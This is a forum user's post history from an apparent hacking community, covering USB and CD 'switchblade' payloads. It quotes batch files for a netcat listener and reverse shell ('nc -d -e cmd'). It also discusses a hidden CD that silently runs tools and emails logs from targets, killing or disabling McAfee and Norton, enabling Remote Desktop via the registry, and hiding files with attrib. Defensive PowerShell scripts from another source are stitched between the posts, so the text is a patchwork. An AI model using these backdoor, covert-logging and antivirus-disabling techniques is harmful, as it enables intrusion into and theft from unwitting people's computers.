
sc0rpi0

Active Members
  • Posts

    138
  • Joined

  • Last visited

Posts posted by sc0rpi0

  1. Topics merged. Please do not double post again.

    Please accept my sincere apologies. I generally post all my stuff in the usb hacks forum.

    After posting, I noticed that this doesn't really go under the category of usb drive hacks,

    so I posted it in "Hacks and Mods" which I thought was a better place to put it.

    Sorry again if this caused any inconvenience.

  2. There's a really simple backdoor in Volume 21, Issue 4 of 2600.  It's called "Backdooring the NAT'ed Network", by David Dunn.  The tutorial in the article has you create two batch files...

    - server.bat:

    @echo off

    cls

    nc.exe -v -v -L -p <port>

    - backdoor.bat:

    @echo off

    echo You have been owned.

    nc -d -e cmd -t <IP address or FQDN> <port>

    I just tried this with the copy of netcat for Windows linked to earlier in this thread, and it works fine.

    Hope this helped.

    Thanks so much for your help.

  3. Something is up with my server for my site. I'll have a rar up ASAP for you to see what I have done. Keep in mind my code is very disorganized; I'm new to this. I haven't programmed since high school C++. It does work perfectly (except for the keylogger for now), but it is nowhere near finished. This is just a version that was thrown together to make sure it worked. With that being said, let me figure out why it won't upload.

    No hurry.

    Thanks.

  4. I have never used netcat before...and do not intend doing so on my own computer.

    Recently, I've found several sources saying that the default netcat does not have the "-e" option automatically compiled.

    In other words, unless netcat is separately compiled, it cannot function as a backdoor/remote access tool.

    I download netcat from here:

    http://www.vulnwatch.org/netcat/

    Much appreciated.

  5. I already have a working CD. In fact, the files are hidden; the CD 'looks' completely blank. The program files are copied to the computer, executed, and a log file appears in my inbox within 30 seconds. There is no sign anything happened at all. Tested on 4 computers, no problems at all. Afterwards, all the copied programs and such are removed from the system and no trace is left.

    If it's not too much trouble, would you mind posting the files in something like a zip?

    With MediaFire, the file can be hosted in a matter of seconds.

    Thanks very much.

  6. Sure, just one problem. USB drives put the information on the USB drive. Since CDs cannot be written to, the logs must be FTP'd or emailed off.

    Chances are, if your target is not your grandma, then the target's firewall will block the email leaving you with nothing. :(

    Great idea though.

    Actually *MOST* firewalls allow any outgoing traffic (even Smoothwall until recently by default allowed any outgoing traffic), and most people only use Windows' built-in firewall.

    Thanks for the information. Most people I know use either McAfee or Norton. I believe that both block outbound until permission is granted. Although this can be easily fixed by "net stop security center," the security center stops the FTP.

  7. So, instead of fighting with the autorun on non-USB keys and hoping the person will run the program (if you are not accessing the computer), why can't this be installed on a cheap CD and, instead of the information being written on the drive, it writes to the root directory *.log/*.rar, emails results, and deletes the file? The person gets what they need off the CD and is none the wiser?

    In this case, autorun will obviously work (unless disabled completely) and if the CD is just blank, the person may just discard it, leaving no trace at all.

    None of the programs that I have seen need to write to themselves or on the disk they are on; they write data where you tell it, correct?

    Could this be done??

    Sure, just one problem. USB drives put the information on the USB drive. Since CDs cannot be written to, the logs must be FTP'd or emailed off.

    Chances are, if your target is not your grandma, then the target's firewall will block the email leaving you with nothing. :(

    Great idea though.

  8. @ Sc0rpi0,

    Hmmm... yeah, that does sound a bit complicated. I'm gonna re-install McAfee and see what I can think of. The way I'm setting mine up, though, I want the user to kill their own AV. For example, the average user, if they thought they might have a virus, what's the first thing they're gonna do... try to do a virus scan. So my idea is: if virusprocess tries to execute, then do this, etc.

    I'm trying to set something up so each step an average user would take to troubleshoot something like a virus will backfire, but I also have an antidote :)

    Sounds good! Please tell me how it goes.

    Thanks.

  9. @ Sc0rpi0,

    Yes, McAfee and Norton are the 2 I'm gonna be most concerned with, because that's what I mostly see on people's computers. Like sablefoxx said, deleting or encrypting McAfee files would be a good idea also... maybe if XP, use built-in Windows encryption, if possible with a .bat file. Also most of these AVs have services that run, and I'm not sure, but I think even if the process is killed, the service or some type of service associated with the AV is still running, depending on the AV.

    So you're saying to delete the program files? Just a suggestion, but wouldn't it be best to kill the processes, make a zipped copy of the program files, delete them, run the otherwise-detected stuff, and finally replace the program files and rerun the processes?

    Kind of complicated, but maybe I'll create a special batch file package for just Norton and McAfee.

    I have McAfee but most people I've talked to have Norton. Neither is pausable or completely killable.

  10. @ Sc0rpi0,

    Yeah, I plan to use pskill to kill all existing AV/spyware processes... or wouldn't it be better if, instead of killing the process, we just stop the service temporarily ;)

    Great idea! These anti-AV tricks don't really work that well with McAfee.

    Even with all of its processes killed, whenever a directory is accessed or a file run, the processes start again... :-(

    Any idea?

  11. If I enable remote desktop with this:

    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0 /f

    does this mean that I can remotely login to my computer from anywhere? Do I need to make any more configs such as making firewall exceptions?

    Please assume that I have configured my 3rd party firewall.

    Is this a security hazard if I do not have a login password? Meaning, could anyone connect?

    Much appreciated.
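Added here as an example, not part of the thread: the questions in the post above (does the reg add open RDP to anyone, is a blank password a hazard) come down to a handful of settings that can be read back on the host. The script below audits them from an elevated PowerShell on the machine being checked. Assumptions: Get-NetFirewallRule is available (Windows 8 / Server 2012 and later); a missing LimitBlankPasswordUse value is treated as the Windows default of 1 (blank-password accounts limited to console logon); a missing fDenyTSConnections value is treated as RDP not enabled.

```powershell
# Added example (not from the thread): audit whether Remote Desktop is reachable
# and whether blank-password accounts could be used over it.
# Assumes Windows 8 / Server 2012 or later and an elevated PowerShell session.

function Get-RdpExposure {
    $ts  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $tcp = "$ts\WinStations\RDP-Tcp"
    $lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

    # fDenyTSConnections: 0 = connections allowed (what the reg add in the post sets), 1 = denied.
    # A missing value reads as $null here and is reported as "not enabled".
    $deny = (Get-ItemProperty -Path $ts -Name fDenyTSConnections -ErrorAction SilentlyContinue).fDenyTSConnections

    # UserAuthentication: 1 = Network Level Authentication is required before a session exists.
    $nla = (Get-ItemProperty -Path $tcp -Name UserAuthentication -ErrorAction SilentlyContinue).UserAuthentication

    # LimitBlankPasswordUse: 1 (Windows default) = accounts with a blank password may only
    # log on at the console, so they cannot be used for an RDP logon; 0 = no such limit.
    $blank = (Get-ItemProperty -Path $lsa -Name LimitBlankPasswordUse -ErrorAction SilentlyContinue).LimitBlankPasswordUse

    # Enabled inbound allow rules in the built-in "Remote Desktop" group.
    $fw = Get-NetFirewallRule -DisplayGroup 'Remote Desktop' -Direction Inbound `
                              -Enabled True -Action Allow -ErrorAction SilentlyContinue

    [pscustomobject]@{
        RdpEnabled            = ($deny -eq 0)
        NlaRequired           = ($nla -eq 1)
        BlankPasswordsBlocked = ($blank -ne 0)      # $null (missing) counts as the default, 1
        FirewallAllowsInbound = (@($fw).Count -gt 0)
    }
}

$state = Get-RdpExposure
$state | Format-List

# The combinations the post asks about, reported as warnings rather than acted on.
if ($state.RdpEnabled -and -not $state.BlankPasswordsBlocked) {
    Write-Warning 'RDP is enabled and blank-password accounts are not limited to console logon.'
}
if ($state.RdpEnabled -and -not $state.NlaRequired) {
    Write-Warning 'RDP is enabled without Network Level Authentication.'
}
if ($state.RdpEnabled -and -not $state.FirewallAllowsInbound) {
    Write-Warning 'RDP is enabled in the registry but no inbound firewall rule allows it (expected when a 3rd-party firewall is used instead).'
}
```

Reading the result: with the registry change from the post applied, RdpEnabled is True; whether "anyone" can connect then depends on the other three fields, the firewall (Windows or third-party) deciding reachability and NLA plus the blank-password limit deciding whether a passwordless account is usable over the wire at all.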

  12. Ok thanks man  8-)

    But in fact the real problem wasn't solved exactly by showing the hidden files. I had to make Windows show the system files indeed! Only in this case can I see all the files of the folder sbs, though I could see the files with the CLI.

    Why does Windows consider them system files?

    The reason why you had to tell Windows to show the hidden and system files to see the hacksaw stuff is because the hacksaw stuff was initially hidden to avoid being seen.

    To make Windows consider a file hidden and a system file, do this:

    attrib "file location" +s +h

    +s is what makes the file a "system file"

    +h is what makes the file a "hidden file"

    Hope this helps.
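Added here as an example, not part of the thread: the post above explains that "attrib +s +h" sets two attribute bits, and Explorer hides files carrying both even when "show hidden files" is on, which is why the sbs folder looked empty. The PowerShell function below lists files with exactly that combination so a folder or removable drive can be checked without relying on Explorer. It assumes PowerShell 5.0 or later (for -Depth) and that the caller supplies the root to inspect ($Root); the drive letter in the usage line is a placeholder.

```powershell
# Added example (not from the thread): find files carrying both the System and
# Hidden attributes, i.e. what "attrib +s +h" produces. Requires PowerShell 5.0+.

function Find-SuperHiddenFiles {
    param(
        [Parameter(Mandatory)] [string] $Root,   # folder or drive root to inspect
        [int] $MaxDepth = 3                      # how far to recurse below $Root
    )
    # Both bits must be set for a file to be treated as "super hidden" by Explorer.
    $mask = [IO.FileAttributes]::Hidden -bor [IO.FileAttributes]::System

    # -Force is required: without it Get-ChildItem silently skips hidden and system entries.
    Get-ChildItem -LiteralPath $Root -Recurse -Depth $MaxDepth -Force -File -ErrorAction SilentlyContinue |
        Where-Object { ($_.Attributes -band $mask) -eq $mask } |
        Select-Object FullName, Length, LastWriteTime,
            @{ Name = 'Attributes'; Expression = { $_.Attributes.ToString() } }
}

# Usage: inspect a removable drive's root (placeholder drive letter, adjust as needed).
Find-SuperHiddenFiles -Root 'E:\' | Format-Table -AutoSize

# To undo the post's command on a file you have identified, clear the same two bits:
#   attrib "file location" -s -h
```

A system drive root will legitimately show a few entries with both bits set (for example desktop.ini, pagefile.sys or hiberfil.sys), so the interesting hits are user-writable folders, removable media, and anything with a recent LastWriteTime that you did not put there.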

  13. I was curious concerning two common switchblade commands.

    What does the ">nul" do in this command:

    if not exist ..\..\Documents\logfiles md ..\..\Documents\logfiles >nul

    What does the "2>&1" do in the command:

    ipconfig /all >> ..\..\Documents\logfiles\%computername%.log 2>&1

    Thanks very much.
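Added here as an example, not part of the thread: the two questions above are about cmd.exe stream redirection. ">nul" sends stream 1 (stdout) to the NUL device, so the command prints nothing; "2>&1" placed after a file redirect sends stream 2 (stderr) to wherever stream 1 is going, so error text lands in the same log instead of on the console. The PowerShell function below runs a small cmd.exe command the three ways and returns what ended up where. It creates and removes a throwaway directory under %TEMP% and touches nothing else; the command it runs (two echo statements) is constructed for the demonstration.

```powershell
# Added example (not from the thread): show what ">nul" and "2>&1" do on a cmd.exe
# command line. Uses a temporary directory; works in Windows PowerShell 5.1 or PowerShell 7.

function Show-CmdRedirection {
    $dir = Join-Path $env:TEMP ('redir-demo-' + [guid]::NewGuid().ToString('N'))
    New-Item -ItemType Directory -Path $dir | Out-Null
    Push-Location $dir   # cmd.exe starts in PowerShell's current directory, so relative names work
    try {
        # Constructed test command: one line to stdout and one line to stderr
        # ("1>&2" inside cmd sends that echo's output to stream 2).
        $noisy = '(echo to-stdout& echo to-stderr 1>&2)'

        # ">nul" discards stdout, so the second command returns nothing at all.
        $shown    = cmd /c 'echo shown'
        $silenced = cmd /c 'echo shown>nul'

        # ">> file" alone captures only stream 1; the stderr line still goes to the
        # console, which is why 2>$null is added on the PowerShell side to keep it quiet.
        cmd /c "$noisy >> stdout-only.log" 2>$null

        # "2>&1" after the file redirect makes stream 2 follow stream 1 into the file.
        cmd /c "$noisy >> both.log 2>&1"

        [pscustomobject]@{
            WithoutNul    = $shown                                          # 'shown'
            WithNul       = $silenced                                       # nothing
            StdoutOnlyLog = @(Get-Content stdout-only.log | ForEach-Object Trim)   # 'to-stdout'
            BothLog       = @(Get-Content both.log | ForEach-Object Trim)          # 'to-stdout','to-stderr'
        }
    }
    finally {
        Pop-Location
        Remove-Item -LiteralPath $dir -Recurse -Force
    }
}

Show-CmdRedirection | Format-List
```

Order matters for the second case: "2>&1" must come after the ">> file" redirect, because it copies whatever stream 1 points to at that moment. Put it first and stderr is duplicated onto the console while stdout alone goes to the file. From a defender's side this is also why a payload that appends both streams to a single log leaves a more complete record (error messages included) than one that redirects stdout only.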
